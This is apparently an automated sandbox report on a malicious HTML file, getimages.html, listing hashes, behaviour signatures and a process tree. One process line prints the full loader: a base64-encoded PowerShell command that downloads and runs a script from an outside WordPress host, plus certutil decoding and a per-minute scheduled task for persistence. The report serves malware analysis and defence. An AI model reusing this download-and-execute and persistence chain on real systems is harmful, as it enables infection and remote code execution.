Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

Static

static

1

getimages.html

windows7-x64

6

getimages.html

windows10-2004-x64

6

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/03/2024, 20:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    getimages.html

  • Size

    48KB

  • MD5

    161749e1ed2439dc07dfd28a97c7c8bd

  • SHA1

    8e822e603f7fef1e3582e1865c8a29e7e93fe6a1

  • SHA256

    2edf03cccfb2a57855a326d4d58c2c82a4834b138a9643b081bd755353bf6764

  • SHA512

    1d8f51b87b1d9d25fc389682d2d174cbcc868e3c9f60eced7e8bb96b834c31ef21a0e047eebdf3e74808c5b4f543b898fc7b51b811627a12fe843b13c7537412

  • SSDEEP

    384:IAzA82WkwmxjXJAzA8yLP5HiLCq48+aqz+chkD+sTq+Yit5kiyUwBRaoDFGfn6+b:ZzjtkwezSzj6AqjkbTMhTkfnR5

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 21 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\getimages.html
    1⤵
      PID:4688
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5448 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
      1⤵
        PID:2368
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=3732 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
        1⤵
          PID:1652
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4632 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:3696
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5764 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
            1⤵
              PID:2856
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=5808 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
              1⤵
                PID:5068
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=3684 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
                1⤵
                  PID:32
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=6036 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
                  1⤵
                    PID:1728
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=6116 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
                    1⤵
                      PID:1348
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6364 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
                      1⤵
                        PID:5184
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6508 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
                        1⤵
                          PID:5676
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5488 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
                          1⤵
                            PID:6004
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=6224 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:1
                            1⤵
                              PID:1600
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6760 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
                              1⤵
                                PID:6012
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7172 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
                                1⤵
                                  PID:5536
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:2636
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c echo c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgLVVzZUJhc2ljUGFyc2luZyAnaHR0cHM6Ly9tYXlhbmJvYXRzLmNvbS93cC1jb250ZW50L3VwbG9hZHMvb2xkZXIucGhwJyAtT3V0RmlsZSAnQzpcUHJvZ3JhbURhdGFcUGhWcU1lMEQuanMnOyBzY2h0YXNrcyAvZGVsZXRlIC9mIC90biBmeFNXVHl1VTEyOyB3c2NyaXB0IEM6XFByb2dyYW1EYXRhXFBoVnFNZTBELmpzIg== > olr5sbIc.bat & schtasks /create /sc minute /mo 1 /f /tr "C:\ProgramData\olr5sbIc.bat" /tn fxSWTyuU12 & certutil -f -decode olr5sbIc.bat olr5sbIc.bat
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2396
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /sc minute /mo 1 /f /tr "C:\ProgramData\olr5sbIc.bat" /tn fxSWTyuU12
                                      2⤵
                                      • Creates scheduled task(s)
                                      PID:5288
                                    • C:\Windows\system32\certutil.exe
                                      certutil -f -decode olr5sbIc.bat olr5sbIc.bat
                                      2⤵
                                        PID:5272
                                    • C:\Windows\SYSTEM32\cmd.exe
                                      C:\Windows\SYSTEM32\cmd.exe /c "C:\ProgramData\olr5sbIc.bat"
                                      1⤵
                                        PID:2376

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\ProgramData\olr5sbIc.bat
                                        Filesize

                                        217B

                                        MD5

                                        f05c0067811f7154e94002f509d2e345

                                        SHA1

                                        071011b7c381fe4a9ac1bc79c3513724fbd979c2

                                        SHA256

                                        9e3fa310ad31670a0b60a0fc8ab1cfda26b90ad20b66f8ce2bb79d0523578213

                                        SHA512

                                        5f1364610c30ff5d91d63635d0877d61c452064e85f48b6d58df24f423eec92b8bf50347797bb4ad0450f20a7b38b9484aed9251f8634c21ee73aacdf0be4fbf

                                        Download Submit